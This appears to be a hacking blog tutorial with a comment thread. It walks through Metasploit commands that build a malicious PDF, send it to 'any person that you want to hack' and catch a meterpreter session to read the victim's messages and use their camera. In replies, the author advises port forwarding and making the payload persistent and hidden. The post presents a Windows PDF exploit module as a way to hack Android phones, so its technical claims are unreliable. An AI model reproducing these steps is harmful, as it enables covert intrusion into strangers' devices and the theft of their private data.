After receiving lot of praise and appreciation on our last post on Android to Android Hacking via Metasploit.  We now gonna post a series of Hacking tools and techniques with working method and full description. This post is about  Hacking android  using Metasploit with PDF File. It works both on Android(via Termux) or any Desktop.

 

Requirements :-

1. Termux app( Download it from Play Store).

2. Install Metasploit Framework in TermuX (Read Part #1 of this post to install Metasploit-Framework in just 4 simple steps).

3. TermuX should be allowed to use External Storage (For this enter the command : “termux-setup-storage”).

4. (Recommended not necessary) Use Hacker`s Keyboard for entering commands in TermuX easily.

 

Once you have completed all requirements we are ready to perform the hack.

Also Read :- Android to Android Hacking (100% working)

Hacking Android Using Metasploit via a PDF File :-

Step 1 :-  Launch Metasploit Console

First of all open Termux, if you are on android or just open your terminal if on Desktop.

Enter the following command to open Metasploit Console

msfconsole

If this kind of screen appears in front of you then we are good and if not there might be problem in installation of metasploit.

metasploit

 

Step 2 :- Creating the Evil PDF (Payload)

Type the commands given below or simply copy paste them one by one to create the PDF File.

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Then you have to set your Localhost. For this you will need your IP Address, to check your IP Address type

ifconfig

in new seesion on termux or in another terminal window. Now come to your metasploit console and set your Localhost like this –

set LHOST 192.168.0.0

Replace the IP Address given in above command by your own IP Address

Now its time to setup port for this enter this command –

set LPORT 4444

You are free to use any port you want like 4564, 8080 etc.

Now its time to generate the Evil PDF File do this by below command –

set filename MyDocument.pdf

Here, you are also free to use any name you want just put it in place of MyDocument but be sure to put .pdf at the end of its name.

 

Now the last command is for final creation of file do this by typing this command –

exploit

metasploit android

Now within a second a message will be displayed saying that your PDF File is created at any default location. First copy that PDF File to your either Internal or External storage like this

mv <fille_location>  <new_location>

And now you are done with creation part. Send it to any person that you want to hack. As soon as he/she will open that pdf file you will get the metasploit session.

Step 3 :- Exploitation

First open your metasploit console by typing

msfconsole

and then start writing below mentioned command –

use exploit/multi/handler/

set LHOST <your_IP>

set LPORT 4444

exploit

 

android hack

Note –  Make sure to enter same IP and Port as you entered above in Step 2.

It will some time and then BOOM you will get meterpreter session. If such output appears then you got access to victim’s phone.

 

For seeing his/her sms, call logs, taking picture from victim’s camera you can use command given on the post about How to Hack an Android Phone with another Android (Without Root) : Android to Android Hacking(Part #2) in the last section.

 

Also Read :- How to hack any social media account using termux in Android

 

Note – This is only for educational purpose and I’m not responsible for any misuse or harm done.

If you need any help then feel free to ask me in comment.

Thanks for coming if you like it then please share it, you will be appreciated.😄

 


41 Comments

Winfred · February 10, 2020 at 12:19 PM

You’re so interesting! I do not believe I’ve read through something like that before.
So wonderful to find someone with a few genuine thoughts on this topic.
Really.. thank you for starting this up.
This website is one thing that’s needed on the web, someone with a little originality!

Hemnt Purohit · February 24, 2020 at 10:41 AM

Bro.. This doesn’t working why
I m showing like this [*] Started reverse TCP handler on 25.226.14. But not going ahead when others opne my pdf file nothing happened. Plz tell me why this happening or this script is fake.
Whatever the reason pls tell me bro…

    Tech4use · September 12, 2020 at 1:52 PM

    Try it multiple time, it is working finely with me. However we are about to post a new way to hack windows by image file (.jpg) stay tuned to us.

Prashant soni · April 13, 2020 at 5:56 PM

The created pdf file is not moving to my internal storage.

    Tech4use · September 12, 2020 at 1:51 PM

    termux-setup-storage

    and then try to move

Gov · April 14, 2020 at 6:53 AM

cant find The payload pdf file is moved to phone storage.could u pls show a screenshot of the termux

    Tech4use · September 12, 2020 at 1:51 PM

    go to Android > data and then inside look for termux related folders

Himanshu · April 28, 2020 at 1:59 PM

Bhai Yar vo PDF to creat hogai hai or mil nahi rahi kha hai

    Tech4use · September 12, 2020 at 1:50 PM

    It should be in Downloads folder

No matter · April 28, 2020 at 2:07 PM

How to add custom directory like u did.. I am unable to create in another folder..it was created in data/data/com.termux which is hidden

    Tech4use · September 12, 2020 at 1:50 PM

    use mkdir command

kitty · April 29, 2020 at 11:32 PM

does the victim should be in the same network?

    Tech4use · September 12, 2020 at 1:49 PM

    Yes but you can use port forwarding for different network

Hugh · May 5, 2020 at 1:31 AM

Hi! I realize this is kind of off-topic however I needed to ask. Does building a well-established blog like yours require a lot of work? I’m brand new to blogging however I do write in my journal everyday. I’d like to start a blog so I can easily share my own experience and thoughts online. Please let me know if you have any kind of recommendations or tips for new aspiring blog owners. Thankyou!|

    Tech4use · September 12, 2020 at 1:49 PM

    write blog about in which you are involved most.

Francesco · June 29, 2020 at 10:59 AM

Useful information. Lucky me I found your website by accident, and I’m stunned why this accident did not came about earlier! I bookmarked it.|

    Tech4use · September 12, 2020 at 1:48 PM

    thanks

Latisha · July 4, 2020 at 1:50 PM

You could certainly see your enthusiasm in the work you write. The world hopes for more passionate writers such as you who aren’t afraid to mention how they believe. All the time go after your heart.|

    Tech4use · September 12, 2020 at 1:48 PM

    thanks

gizmochina · July 16, 2020 at 9:22 AM

you are really a good webmaster. The website loading speed is amazing. It seems that you are doing any unique trick. Furthermore, The contents are masterwork. you’ve done a great job on this topic!

kfconsole real · July 16, 2020 at 9:52 AM

Heya i am for the first time here. I found this board and I find It really useful & it helped me out much. I hope to give something back and help others like you aided me.

kfc unveils new console · July 16, 2020 at 12:16 PM

I happen to be writing to let you be aware of what a awesome discovery our girl undergone checking yuor web blog. She picked up several pieces, including how it is like to have a wonderful giving style to get certain people just know precisely a variety of impossible things. You actually surpassed readers’ expectations. Thank you for supplying those precious, dependable, informative and cool guidance on the topic to Lizeth.

kfconsole real or fake · July 16, 2020 at 12:24 PM

Thank you for another informative web site. Where else could I get that type of information written in such a perfect way? I’ve a project that I’m just now working on, and I have been on the look out for such info.

Damy · July 21, 2020 at 7:13 PM

After creating the pdf can I write something inside it without spoiling everything

    Tech4use · September 12, 2020 at 1:47 PM

    yes you can

Jamaal · July 29, 2020 at 12:08 AM

Hi there are using WordPress for your blog platform?
I’m new to the blog world but I’m trying to get started and set up my own. Do you need
any coding expertise to make your own blog?

Any help would be greatly appreciated!

    Tech4use · September 12, 2020 at 1:43 PM

    NO you don’t need any coding skills here just put the best content and you’re done.

best web hosting · August 8, 2020 at 3:15 AM

What’s up to all, the contents present at this website are truly remarkable for people knowledge, well, keep up
the nice work fellows.

    Tech4use · September 12, 2020 at 1:47 PM

    thanks

web hosting services · August 8, 2020 at 4:33 AM

I’d like to thank you for the efforts you have put in writing this site.

I’m hoping to check out the same high-grade content by you in the
future as well. In truth, your creative writing abilities has motivated me to get my very own site now ;
)

adreamoftrains hosting services · August 8, 2020 at 11:06 AM

Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your
point. You clearly know what youre talking about, why waste your intelligence on just posting videos to your weblog
when you could be giving us something informative to read?
adreamoftrains website host

web hosting providers · August 8, 2020 at 7:41 PM

Hey! I just wanted to ask if you ever have any trouble with hackers?
My last blog (wordpress) was hacked and I ended up losing several weeks of hard work
due to no backup. Do you have any solutions to stop hackers?

    Tech4use · September 12, 2020 at 1:46 PM

    Use ssl portection and cloudfare services to save yourselve from DDos and other malicious attack.

Romeo Goodnight · August 20, 2020 at 7:10 AM

Hi! Someone in my Myspace group shared this website with us so I came to look it over. I’m definitely loving the information. I’m bookmarking and will be tweeting this to my followers! Great blog and brilliant style and design.

    Tech4use · September 12, 2020 at 1:45 PM

    thanks

erotik izle · August 26, 2020 at 9:49 AM

This is really interesting, You are a very skilled blogger. I’ve joined your rss feed and look forward to seeking more of your wonderful post. Also, I have shared your web site in my social networks! Ferdinande Greg Cathleen

Dark lord · August 28, 2020 at 11:37 AM

After completing this hack, how can we remove attackers access from the victim machine?

    Tech4use · September 12, 2020 at 1:45 PM

    Just delete the paylaod,

SpYDeR · August 30, 2020 at 9:23 AM

What if the person delete payload pdf?

    Tech4use · September 12, 2020 at 1:44 PM

    Then this attack will fail. But you can make it persistent and hidden using metasploit commands, so that user can’t see and delete it.

casino · August 31, 2020 at 3:53 AM

Right away I am going to do my breakfast, afterward having my breakfast coming yet again to read more news. Madel Augie Cutler

Leave a Reply

Your email address will not be published. Required fields are marked *

Close Bitnami banner
Bitnami